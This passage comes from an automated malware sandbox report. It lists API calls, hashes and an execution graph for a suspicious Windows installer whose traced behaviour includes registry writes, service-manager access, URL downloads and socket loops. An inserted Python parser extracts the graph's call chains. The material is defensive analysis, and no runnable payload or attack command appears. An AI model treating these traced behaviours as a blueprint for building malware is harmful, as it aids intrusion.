                                                          • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD70
                                                          • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDB0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Value$EnumQuery
                                                          • String ID: Inno Setup: No Icons
                                                          • API String ID: 1576479698-2016326496
                                                          • Opcode ID: 388e812ecd06e97e1b31d188035ef8f8b81e1277dc232162d6a0b94f1a497a96
                                                          • Instruction ID: 0d60c2ceabc561baab214a4f8badfae1c51fae2703c03b7062d0178a0b9483fa
                                                          • Opcode Fuzzy Hash: 388e812ecd06e97e1b31d188035ef8f8b81e1277dc232162d6a0b94f1a497a96
                                                          • Instruction Fuzzy Hash: C3012632B55B307AFB3085256C42F7B568CCF46B60F68003BF981EA2C1D6989C04936E
                                                          APIs
                                                            • Part of subcall function 0047C8B0: FreeLibrary.KERNEL32(6F9D0000,00480FF3), ref: 0047C8C6
                                                            • Part of subcall function 0047C580: GetTickCount.KERNEL32 ref: 0047C5CA
                                                            • Part of subcall function 004570B4: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004570D3
                                                          • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,00497E67), ref: 00497565
                                                          • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,00497E67), ref: 0049756B
                                                          Strings
                                                          • Detected restart. Removing temporary directory., xrefs: 0049751F
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                          • String ID: Detected restart. Removing temporary directory.
                                                          • API String ID: 1717587489-3199836293
                                                          • Opcode ID: 10733e8d0c2fcbcf81e8bc1e4ca83bd3e168a9b9b9b758ab357db50908ba3c86
                                                          • Instruction ID: 3a6ec644de21484b963019a16799c2105d01f9358526232ca3662f3e81dafe78
                                                          • Opcode Fuzzy Hash: 10733e8d0c2fcbcf81e8bc1e4ca83bd3e168a9b9b9b758ab357db50908ba3c86
                                                          • Instruction Fuzzy Hash: C5E0E57121C6007EDE4177B6BC6295B3F9CD745778752483BF40881952E52D5810C6BD
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(00000000,004980C2), ref: 0040334B
                                                          • GetCommandLineA.KERNEL32(00000000,004980C2), ref: 00403356
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CommandHandleLineModule
                                                          • String ID: H6M
                                                          • API String ID: 2123368496-12167474
                                                          • Opcode ID: 48b45b62bccbc2a8e5daf731e4078a894a727d510552ebcfe8024faf6b9ab272
                                                          • Instruction ID: ff8fa06d391bd0b31f892a344b3e95d40f530220570fde7b1ba7fad45aeb04f1
                                                          • Opcode Fuzzy Hash: 48b45b62bccbc2a8e5daf731e4078a894a727d510552ebcfe8024faf6b9ab272
                                                          • Instruction Fuzzy Hash: 45C002609013058AD754AF7579467162A94D751349F80447FF114BA3E1D77C82055BDD
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastSleep
                                                          • String ID:
                                                          • API String ID: 1458359878-0
                                                          • Opcode ID: defff66af4325d3c28b570447d2f47c0b7c8b64933ddb782de5565f815c6b007
                                                          • Instruction ID: de14e8d07cc4d1fec6b94f0f99926b65e7014e25a7505cf550c56fab82152177
                                                          • Opcode Fuzzy Hash: defff66af4325d3c28b570447d2f47c0b7c8b64933ddb782de5565f815c6b007
                                                          • Instruction Fuzzy Hash: 91F0F672640954978A20B5DB89A1A3F724CDA94365760012BEC0CD7203C579CC494BAD

                                                          Execution Graph

                                                          Execution Coverage:2.6%
                                                          Dynamic/Decrypted Code Coverage:83.9%
                                                          Signature Coverage:14.1%
                                                          Total number of Nodes:1025
                                                          Total number of Limit Nodes:36
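The execution_graph text that follows is the serialized call graph behind the report's graph view: each node is a decimal id, the hex address of a basic block and the APIs that block calls, and each `a->b` token is an edge. The Python below is an added example, not part of Joe Sandbox's report or tooling: it rebuilds that graph from the text and walks it to list API call chains, which is the quickest way to pull a sequence such as the WinINet download routine (InternetOpenA, InternetSetOptionA, InternetOpenUrlA, InternetReadFile, InternetCloseHandle) out of the dump. The token rules are inferred from the text on this page rather than from a documented export schema, and the SAMPLE string is an excerpt copied from this report's own graph, trimmed at node 61170 so it stays self-contained.

```python
"""Recover API call chains from the flattened execution_graph text that a
Joe Sandbox report exports (the long line following the coverage figures)."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Token shapes as inferred from the report text. This is an assumption
# about the export, not a documented Joe Sandbox schema:
#   edge   "<src>-><dst>"                 e.g. 61161->61162
#   node   "<id> <hexaddr> [labels...]"   e.g. 61166 2db7342 InternetReadFile
#   labels API names and annotations such as "59 API calls" or "__cftof2_l"
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ID_RE = re.compile(r"^\d+$")
ADDR_RE = re.compile(r"^[0-9a-f]{5,8}$")
API_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_:@]*$")
NOISE = {"API", "calls", "library"}  # words from "N API calls" annotations


@dataclass
class Node:
    addr: str
    labels: list = field(default_factory=list)

    @property
    def apis(self):
        """Labels that look like identifiers; drops counts and annotation words."""
        return [t for t in self.labels if API_RE.match(t) and t not in NOISE]


def parse_graph(text):
    """Return ({node_id: Node}, [(src, dst), ...]) for one execution_graph dump."""
    tokens = text.split()
    nodes, edges, cur, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges.append((m.group(1), m.group(2)))
            i += 1
        elif ID_RE.match(tok) and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            # A decimal id immediately followed by a hex address opens a node.
            cur = nodes[tok] = Node(tokens[i + 1])
            i += 2
        else:
            if cur is not None:  # anything else is a label of the open node
                cur.labels.append(tok)
            i += 1
    return nodes, edges


def api_chains(nodes, edges, start, max_depth=16):
    """Enumerate simple paths from `start` and the API names met along each."""
    succ = defaultdict(list)
    for s, d in edges:
        succ[s].append(d)
    chains = []

    def walk(nid, path, apis):
        node = nodes.get(nid)
        apis = apis + (node.apis if node else [])
        nxt = [d for d in succ[nid] if d not in path]
        if not nxt or len(path) >= max_depth:
            chains.append((path, apis))
            return
        for d in nxt:
            walk(d, path + [d], apis)

    walk(start, [start], [])
    return chains


def unique_apis(nodes):
    """Sorted set of every API name in the graph, handy for a first triage pass."""
    return sorted({a for n in nodes.values() for a in n.apis})


# Excerpt copied from the execution_graph text of this report (the WinINet
# download routine at 2db72ab). The two outgoing edges of node 61170 are
# omitted so the excerpt stays self-contained.
SAMPLE = (
    "execution_graph 61161 2db72ab InternetOpenA 61162 2db72c9 InternetSetOptionA "
    "InternetSetOptionA InternetSetOptionA 61161->61162 61172 2db7389 __cftof2_l "
    "61161->61172 61265 2dc4af0 61162->61265 61165 2db7382 InternetCloseHandle "
    "61165->61172 61166 2db7342 InternetReadFile 61171 2db7377 InternetCloseHandle "
    "61166->61171 61170 2db66f4 61171->61165 61172->61170 61266 2db7322 "
    "InternetOpenUrlA 61265->61266 61266->61165 61266->61166"
)

if __name__ == "__main__":
    nodes, edges = parse_graph(SAMPLE)
    print("APIs:", ", ".join(unique_apis(nodes)))
    for path, apis in api_chains(nodes, edges, "61161"):
        print(" -> ".join(path), ":", " ".join(apis))
```

Feeding the whole execution_graph line to `parse_graph` works the same way; starting `api_chains` at the node that carries `WSASocketA` or `CreateIoCompletionPort` then gives the Winsock connect/send/recv loop, which is the part worth comparing against the Suricata alerts and the C2 configuration listed earlier in the report.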
                                                          execution_graph 61139 4022e0 61142 401f64 FindResourceA 61139->61142 61141 4022e5 61143 401f86 GetLastError SizeofResource 61142->61143 61149 401f9f 61142->61149 61144 401fa6 LoadResource LockResource GlobalAlloc 61143->61144 61143->61149 61145 401fd2 61144->61145 61146 401ffb GetTickCount 61145->61146 61148 402005 GlobalAlloc 61146->61148 61148->61149 61149->61141 60619 402c02 60620 402c07 60619->60620 60621 40d413 CopyFileA 60620->60621 60622 40d41a 60621->60622 60623 402603 RegOpenKeyExA 60624 40d580 60623->60624 61150 40d6a6 CreateDirectoryA 61151 402768 RegCreateKeyExA 61152 4025c0 61151->61152 61153 40277b 61151->61153 61154 402c19 SetEvent 61152->61154 61153->61154 61155 402c60 61153->61155 61154->61155 61156 40ddfe GetTickCount 61155->61156 60625 40d54a 60626 40d587 OpenSCManagerA 60625->60626 60627 40dc48 60626->60627 61157 40226a Sleep 61158 40d891 61157->61158 61159 40282c VirtualAlloc 61160 40d0a0 61159->61160 60628 4027ce RegCloseKey 60629 402850 60630 40d50e RegSetValueExA 60629->60630 60632 2db648b RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 60671 2db42c7 60632->60671 60634 2db64f3 GetTickCount 60635 2db605a 59 API calls 60634->60635 60636 2db6508 GetVersionExA 60635->60636 60637 2db6549 __cftof2_l 60636->60637 60638 2dc2fac _malloc 59 API calls 60637->60638 60639 2db6556 60638->60639 60640 2dc2fac _malloc 59 API calls 60639->60640 60641 2db6566 60640->60641 60642 2dc2fac _malloc 59 API calls 60641->60642 60643 2db6571 60642->60643 60644 2dc2fac _malloc 59 API calls 60643->60644 60645 2db657c 60644->60645 60646 2dc2fac _malloc 59 API calls 60645->60646 60647 2db6587 60646->60647 60648 2dc2fac _malloc 59 API calls 60647->60648 60649 2db6592 60648->60649 60650 2dc2fac _malloc 59 API calls 60649->60650 60651 2db659d 60650->60651 60652 2dc2fac _malloc 59 API calls 60651->60652 60653 2db65ac 6 API calls 60652->60653 60654 2db65ff __cftof2_l 
60653->60654 60655 2db6618 RtlEnterCriticalSection RtlLeaveCriticalSection 60654->60655 60656 2dc2fac _malloc 59 API calls 60655->60656 60657 2db6657 60656->60657 60658 2dc2fac _malloc 59 API calls 60657->60658 60659 2db6665 60658->60659 60660 2dc2fac _malloc 59 API calls 60659->60660 60661 2db666c 60660->60661 60662 2dc2fac _malloc 59 API calls 60661->60662 60663 2db6692 QueryPerformanceCounter Sleep 60662->60663 60664 2dc2fac _malloc 59 API calls 60663->60664 60665 2db66bf 60664->60665 60666 2dc2fac _malloc 59 API calls 60665->60666 60667 2db66cc __cftof2_l 60666->60667 60668 2db6708 Sleep 60667->60668 60669 2db670e RtlEnterCriticalSection RtlLeaveCriticalSection 60667->60669 60668->60669 60670 2db6744 __cftof2_l 60669->60670 60672 2db42cd 60671->60672 60673 403310 GetVersion 60697 404454 HeapCreate 60673->60697 60675 40336f 60676 403374 60675->60676 60677 40337c 60675->60677 60772 40342b 8 API calls 60676->60772 60709 404134 60677->60709 60681 403384 GetCommandLineA 60723 404002 60681->60723 60685 40339e 60755 403cfc 60685->60755 60687 4033a3 60688 4033a8 GetStartupInfoA 60687->60688 60768 403ca4 60688->60768 60690 4033ba GetModuleHandleA 60692 4033de 60690->60692 60773 403a4b GetCurrentProcess TerminateProcess ExitProcess 60692->60773 60694 4033e7 60774 403b20 UnhandledExceptionFilter 60694->60774 60696 4033f8 60698 404474 60697->60698 60699 4044aa 60697->60699 60775 40430c 19 API calls 60698->60775 60699->60675 60701 404479 60702 404483 60701->60702 60704 404490 60701->60704 60776 40482b HeapAlloc 60702->60776 60705 4044ad 60704->60705 60777 40507c HeapAlloc VirtualAlloc VirtualAlloc VirtualFree HeapFree 60704->60777 60705->60675 60706 40448d 60706->60705 60708 40449e HeapDestroy 60706->60708 60708->60699 60778 40344f 60709->60778 60712 404153 GetStartupInfoA 60720 404264 60712->60720 60722 40419f 60712->60722 60715 4042cb SetHandleCount 60715->60681 60716 40428b GetStdHandle 60718 404299 GetFileType 60716->60718 60716->60720 60717 40344f 12 API calls 
60717->60722 60718->60720 60719 404210 60719->60720 60721 404232 GetFileType 60719->60721 60720->60715 60720->60716 60721->60719 60722->60717 60722->60719 60722->60720 60724 404050 60723->60724 60725 40401d GetEnvironmentStringsW 60723->60725 60727 404025 60724->60727 60728 404041 60724->60728 60726 404031 GetEnvironmentStrings 60725->60726 60725->60727 60726->60728 60729 403394 60726->60729 60730 404069 WideCharToMultiByte 60727->60730 60731 40405d GetEnvironmentStringsW 60727->60731 60728->60729 60733 4040e3 GetEnvironmentStrings 60728->60733 60734 4040ef 60728->60734 60746 403db5 60729->60746 60735 40409d 60730->60735 60736 4040cf FreeEnvironmentStringsW 60730->60736 60731->60729 60731->60730 60733->60729 60733->60734 60737 40344f 12 API calls 60734->60737 60738 40344f 12 API calls 60735->60738 60736->60729 60744 40410a 60737->60744 60739 4040a3 60738->60739 60739->60736 60740 4040ac WideCharToMultiByte 60739->60740 60742 4040c6 60740->60742 60743 4040bd 60740->60743 60741 404120 FreeEnvironmentStringsA 60741->60729 60742->60736 60787 403501 60743->60787 60744->60741 60747 403dc7 60746->60747 60748 403dcc GetModuleFileNameA 60746->60748 60800 406614 19 API calls 60747->60800 60750 403def 60748->60750 60751 40344f 12 API calls 60750->60751 60752 403e10 60751->60752 60754 403e20 60752->60754 60801 403406 7 API calls 60752->60801 60754->60685 60756 403d09 60755->60756 60758 403d0e 60755->60758 60802 406614 19 API calls 60756->60802 60759 40344f 12 API calls 60758->60759 60760 403d3b 60759->60760 60767 403d4f 60760->60767 60803 403406 7 API calls 60760->60803 60762 403d92 60763 403501 7 API calls 60762->60763 60764 403d9e 60763->60764 60764->60687 60765 40344f 12 API calls 60765->60767 60767->60762 60767->60765 60804 403406 7 API calls 60767->60804 60769 403cad 60768->60769 60771 403cb2 60768->60771 60805 406614 19 API calls 60769->60805 60771->60690 60773->60694 60774->60696 60775->60701 60776->60706 60777->60706 60782 403461 60778->60782 60781 403406 7 API calls 
60781->60712 60783 40345e 60782->60783 60785 403468 60782->60785 60783->60712 60783->60781 60785->60783 60786 40348d 12 API calls 60785->60786 60786->60785 60788 40350d 60787->60788 60796 403529 60787->60796 60791 403517 60788->60791 60792 40352d 60788->60792 60789 403558 60790 403559 HeapFree 60789->60790 60790->60796 60791->60790 60793 403523 60791->60793 60792->60789 60795 403547 60792->60795 60798 40489e VirtualFree VirtualFree HeapFree 60793->60798 60799 40532f VirtualFree HeapFree VirtualFree 60795->60799 60796->60742 60798->60796 60799->60796 60800->60748 60801->60754 60802->60758 60803->60767 60804->60767 60805->60771 61161 2db72ab InternetOpenA 61162 2db72c9 InternetSetOptionA InternetSetOptionA InternetSetOptionA 61161->61162 61172 2db7389 __cftof2_l 61161->61172 61265 2dc4af0 61162->61265 61165 2db7382 InternetCloseHandle 61165->61172 61166 2db7342 InternetReadFile 61171 2db7377 InternetCloseHandle 61166->61171 61168 2db6708 Sleep 61169 2db670e RtlEnterCriticalSection RtlLeaveCriticalSection 61168->61169 61176 2db6744 __cftof2_l 61169->61176 61170 2db66f4 61170->61168 61170->61169 61171->61165 61172->61170 61173 2db73e9 RtlEnterCriticalSection RtlLeaveCriticalSection 61172->61173 61267 2dc233c 61173->61267 61175 2db7413 61177 2db7463 61175->61177 61179 2dc233c 66 API calls 61175->61179 61177->61170 61178 2dc233c 66 API calls 61177->61178 61180 2db7484 61178->61180 61181 2db7427 61179->61181 61184 2dc2fac _malloc 59 API calls 61180->61184 61236 2db7738 61180->61236 61181->61177 61183 2dc233c 66 API calls 61181->61183 61182 2dc233c 66 API calls 61185 2db7750 61182->61185 61186 2db743b 61183->61186 61187 2db749d RtlEnterCriticalSection RtlLeaveCriticalSection 61184->61187 61188 2db779d 61185->61188 61189 2db775a __cftof2_l 61185->61189 61186->61177 61191 2dc233c 66 API calls 61186->61191 61215 2db74d5 __cftof2_l 61187->61215 61190 2dc233c 66 API calls 61188->61190 61196 2db776a RtlEnterCriticalSection RtlLeaveCriticalSection 61189->61196 61192 2db77ab 
61190->61192 61193 2db744f 61191->61193 61194 2db77b1 61192->61194 61195 2db77d0 61192->61195 61193->61177 61198 2dc233c 66 API calls 61193->61198 61320 2db61f5 61194->61320 61199 2dc233c 66 API calls 61195->61199 61196->61170 61198->61177 61200 2db77de 61199->61200 61201 2db7b00 61200->61201 61205 2db77f0 61200->61205 61202 2dc233c 66 API calls 61201->61202 61203 2db7b0e 61202->61203 61203->61170 61204 2dc2fac _malloc 59 API calls 61203->61204 61210 2db7b22 __cftof2_l 61204->61210 61205->61170 61323 2dc2418 61205->61323 61209 2db78aa 61211 2db78e2 RtlEnterCriticalSection 61209->61211 61216 2db7b4f 61210->61216 61393 2db534d 93 API calls 2 library calls 61210->61393 61213 2db790f RtlLeaveCriticalSection 61211->61213 61214 2db7905 61211->61214 61212 2db755c 61218 2dc2fac _malloc 59 API calls 61212->61218 61341 2db3c67 61213->61341 61214->61213 61215->61212 61221 2dc233c 66 API calls 61215->61221 61219 2dc2f74 _free 59 API calls 61216->61219 61227 2db7593 __cftof2_l 61218->61227 61219->61170 61221->61212 61228 2db75f8 61227->61228 61386 2dc35e6 60 API calls 3 library calls 61227->61386 61230 2dc2f74 _free 59 API calls 61228->61230 61229 2db7ae7 61392 2db9002 88 API calls __EH_prolog 61229->61392 61234 2db75fe 61230->61234 61234->61236 61237 2dc3b4c _Allocate 60 API calls 61234->61237 61235 2db7aaf 61371 2db83e9 61235->61371 61236->61182 61241 2db760e 61237->61241 61245 2db7629 61241->61245 61389 2db9736 212 API calls __EH_prolog 61241->61389 61244 2dba724 73 API calls 61251 2db7a1a 61244->61251 61277 2dba84e 61245->61277 61246 2db75c4 61246->61228 61387 2dc2850 59 API calls _vscan_fn 61246->61387 61388 2dc35e6 60 API calls 3 library calls 61246->61388 61250 2db763f 61281 2db5119 61250->61281 61251->61235 61252 2dba724 73 API calls 61251->61252 61254 2db7a6b 61252->61254 61254->61235 61366 2dbd116 61254->61366 61256 2db7687 61310 2dbac0e 61256->61310 61259 2db76ec Sleep 61390 2dc18f0 GetProcessHeap HeapFree 61259->61390 61260 2db76e7 shared_ptr 61260->61259 61262 
2db7708 61263 2db7722 shared_ptr 61262->61263 61391 2db4100 GetProcessHeap HeapFree 61262->61391 61263->61236 61266 2db7322 InternetOpenUrlA 61265->61266 61266->61165 61266->61166 61268 2dc2348 61267->61268 61269 2dc236b 61267->61269 61268->61269 61271 2dc234e 61268->61271 61396 2dc2383 66 API calls 4 library calls 61269->61396 61394 2dc5e5b 59 API calls __getptd_noexit 61271->61394 61272 2dc237e 61272->61175 61274 2dc2353 61395 2dc4ef5 9 API calls __beginthreadex 61274->61395 61276 2dc235e 61276->61175 61278 2dba858 __EH_prolog 61277->61278 61397 2dbdfff 61278->61397 61280 2dba876 shared_ptr 61280->61250 61282 2db5123 __EH_prolog 61281->61282 61401 2dc0b10 61282->61401 61285 2db3c67 72 API calls 61286 2db514a 61285->61286 61287 2db3d7e 64 API calls 61286->61287 61288 2db5158 61287->61288 61289 2db833a 89 API calls 61288->61289 61290 2db516c 61289->61290 61291 2dba724 73 API calls 61290->61291 61292 2db5322 shared_ptr 61290->61292 61293 2db519d 61291->61293 61292->61256 61293->61292 61294 2db51f6 61293->61294 61295 2db51c4 61293->61295 61297 2dba724 73 API calls 61294->61297 61296 2dba724 73 API calls 61295->61296 61299 2db51d4 61296->61299 61298 2db5207 61297->61298 61298->61292 61300 2dba724 73 API calls 61298->61300 61299->61292 61302 2dba724 73 API calls 61299->61302 61301 2db524a 61300->61301 61301->61292 61304 2dba724 73 API calls 61301->61304 61303 2db52b4 61302->61303 61303->61292 61305 2dba724 73 API calls 61303->61305 61304->61299 61306 2db52da 61305->61306 61306->61292 61307 2dba724 73 API calls 61306->61307 61308 2db5304 61307->61308 61405 2dbced8 61308->61405 61311 2dbac18 __EH_prolog 61310->61311 61429 2dbd0ed 72 API calls 61311->61429 61313 2dbac39 shared_ptr 61430 2dc20f0 61313->61430 61315 2dbac50 61316 2db76d4 61315->61316 61436 2db3fb0 68 API calls Mailbox 61315->61436 61316->61259 61316->61260 61318 2dbac5c 61437 2dba68a 60 API calls 4 library calls 61318->61437 61321 2dc2fac _malloc 59 API calls 61320->61321 61322 2db6208 61321->61322 61324 
2dc2449 61323->61324 61325 2dc2434 61323->61325 61324->61325 61329 2dc2450 61324->61329 61672 2dc5e5b 59 API calls __getptd_noexit 61325->61672 61327 2dc2439 61673 2dc4ef5 9 API calls __beginthreadex 61327->61673 61330 2db7827 61329->61330 61674 2dc5f01 79 API calls 7 library calls 61329->61674 61332 2db1ba7 61330->61332 61675 2dd53f0 61332->61675 61334 2db1bb1 RtlEnterCriticalSection 61335 2db1be9 RtlLeaveCriticalSection 61334->61335 61337 2db1bd1 61334->61337 61676 2dbe32f 61335->61676 61337->61335 61338 2db1c55 RtlLeaveCriticalSection 61337->61338 61338->61209 61339 2db1c22 61339->61338 61342 2dc0b10 Mailbox 68 API calls 61341->61342 61343 2db3c7e 61342->61343 61739 2db3ca2 61343->61739 61348 2db3d7e 61349 2db3dcb htons 61348->61349 61350 2db3d99 htons 61348->61350 61769 2db3c16 60 API calls 2 library calls 61349->61769 61768 2db3bd3 60 API calls 2 library calls 61350->61768 61353 2db3db7 htonl htonl 61354 2db3ded 61353->61354 61355 2db833a 61354->61355 61356 2db8373 61355->61356 61357 2db8352 61355->61357 61360 2db796c 61356->61360 61773 2db2ac7 61356->61773 61770 2db95fc 61357->61770 61360->61229 61361 2dba724 61360->61361 61362 2dc0b10 Mailbox 68 API calls 61361->61362 61363 2dba73e 61362->61363 61364 2db79b8 61363->61364 61844 2db2db5 61363->61844 61364->61235 61364->61244 61367 2dc0b10 Mailbox 68 API calls 61366->61367 61368 2dbd12c 61367->61368 61369 2dbd21a 61368->61369 61370 2db2db5 73 API calls 61368->61370 61369->61235 61370->61368 61372 2db8404 WSASetLastError shutdown 61371->61372 61373 2db83f4 61371->61373 61375 2dba508 69 API calls 61372->61375 61374 2dc0b10 Mailbox 68 API calls 61373->61374 61376 2db7ac7 61374->61376 61377 2db8421 61375->61377 61379 2db33b2 61376->61379 61377->61376 61378 2dc0b10 Mailbox 68 API calls 61377->61378 61378->61376 61380 2db33e1 61379->61380 61381 2db33c4 InterlockedCompareExchange 61379->61381 61383 2db29ee 76 API calls 61380->61383 61381->61380 61382 2db33d6 61381->61382 61868 2db32ab 78 API calls 2 library calls 
61382->61868 61385 2db33f1 61383->61385 61385->61229 61386->61246 61387->61246 61388->61246 61389->61245 61390->61262 61391->61263 61392->61170 61393->61216 61394->61274 61395->61276 61396->61272 61398 2dbe009 __EH_prolog 61397->61398 61399 2dc3b4c _Allocate 60 API calls 61398->61399 61400 2dbe020 61399->61400 61400->61280 61402 2dc0b39 61401->61402 61403 2db513d 61401->61403 61404 2dc33a4 __cinit 68 API calls 61402->61404 61403->61285 61404->61403 61406 2dc0b10 Mailbox 68 API calls 61405->61406 61408 2dbcef2 61406->61408 61407 2dbd001 61407->61292 61408->61407 61410 2db2b95 61408->61410 61411 2db2bb1 61410->61411 61412 2db2bc7 61410->61412 61413 2dc0b10 Mailbox 68 API calls 61411->61413 61415 2db2bd2 61412->61415 61424 2db2bdf 61412->61424 61414 2db2bb6 61413->61414 61414->61408 61417 2dc0b10 Mailbox 68 API calls 61415->61417 61416 2db2be2 WSASetLastError WSARecv 61425 2dba508 61416->61425 61417->61414 61419 2db2d22 61428 2db1996 68 API calls __cinit 61419->61428 61421 2db2cbc WSASetLastError select 61422 2dba508 69 API calls 61421->61422 61422->61424 61423 2dc0b10 68 API calls Mailbox 61423->61424 61424->61414 61424->61416 61424->61419 61424->61421 61424->61423 61426 2dc0b10 Mailbox 68 API calls 61425->61426 61427 2dba514 WSAGetLastError 61426->61427 61427->61424 61428->61414 61429->61313 61438 2dc33b9 61430->61438 61433 2dc2114 61433->61315 61434 2dc213d ResumeThread 61434->61315 61435 2dc2136 CloseHandle 61435->61434 61436->61318 61439 2dc33db 61438->61439 61440 2dc33c7 61438->61440 61442 2dc8a6d __calloc_crt 59 API calls 61439->61442 61462 2dc5e5b 59 API calls __getptd_noexit 61440->61462 61444 2dc33e8 61442->61444 61443 2dc33cc 61463 2dc4ef5 9 API calls __beginthreadex 61443->61463 61446 2dc3439 61444->61446 61457 2dc5c5a 61444->61457 61447 2dc2f74 _free 59 API calls 61446->61447 61449 2dc343f 61447->61449 61451 2dc210b 61449->61451 61464 2dc5e3a 59 API calls 3 library calls 61449->61464 61451->61433 61451->61434 61451->61435 61452 2dc5ce1 __initptd 59 API 
calls 61454 2dc33fe CreateThread 61452->61454 61454->61451 61456 2dc3431 GetLastError 61454->61456 61481 2dc3519 61454->61481 61456->61446 61465 2dc5c72 GetLastError 61457->61465 61459 2dc5c60 61460 2dc33f5 61459->61460 61479 2dc8440 59 API calls 3 library calls 61459->61479 61460->61452 61462->61443 61463->61451 61464->61451 61466 2dc91cb __getptd_noexit TlsGetValue 61465->61466 61467 2dc5c87 61466->61467 61468 2dc5cd5 SetLastError 61467->61468 61469 2dc8a6d __calloc_crt 56 API calls 61467->61469 61468->61459 61470 2dc5c9a 61469->61470 61470->61468 61480 2dc91ea TlsSetValue 61470->61480 61472 2dc5cae 61473 2dc5ccc 61472->61473 61474 2dc5cb4 61472->61474 61476 2dc2f74 _free 56 API calls 61473->61476 61475 2dc5ce1 __initptd 56 API calls 61474->61475 61477 2dc5cbc GetCurrentThreadId 61475->61477 61478 2dc5cd2 61476->61478 61477->61468 61478->61468 61480->61472 61482 2dc3522 __threadstartex@4 61481->61482 61483 2dc91cb __getptd_noexit TlsGetValue 61482->61483 61484 2dc3528 61483->61484 61485 2dc352f __threadstartex@4 61484->61485 61486 2dc355b 61484->61486 61513 2dc91ea TlsSetValue 61485->61513 61514 2dc5aef 59 API calls 6 library calls 61486->61514 61489 2dc353e 61491 2dc3544 GetLastError RtlExitUserThread 61489->61491 61492 2dc3551 GetCurrentThreadId 61489->61492 61490 2dc3576 ___crtIsPackagedApp 61493 2dc358a 61490->61493 61497 2dc34c1 61490->61497 61491->61492 61492->61490 61503 2dc3452 61493->61503 61498 2dc34ca LoadLibraryExW GetProcAddress 61497->61498 61499 2dc3503 RtlDecodePointer 61497->61499 61500 2dc34ec 61498->61500 61501 2dc34ed RtlEncodePointer 61498->61501 61502 2dc3513 61499->61502 61500->61493 61501->61499 61502->61493 61504 2dc345e __fsopen 61503->61504 61505 2dc5c5a __beginthreadex 59 API calls 61504->61505 61506 2dc3463 61505->61506 61515 2dc2160 61506->61515 61509 2dc3473 61510 2dc8d94 __XcptFilter 59 API calls 61509->61510 61511 2dc3484 61510->61511 61513->61489 61514->61490 61533 2dc1610 61515->61533 61518 2dc21a8 TlsSetValue 61519 2dc21b0 
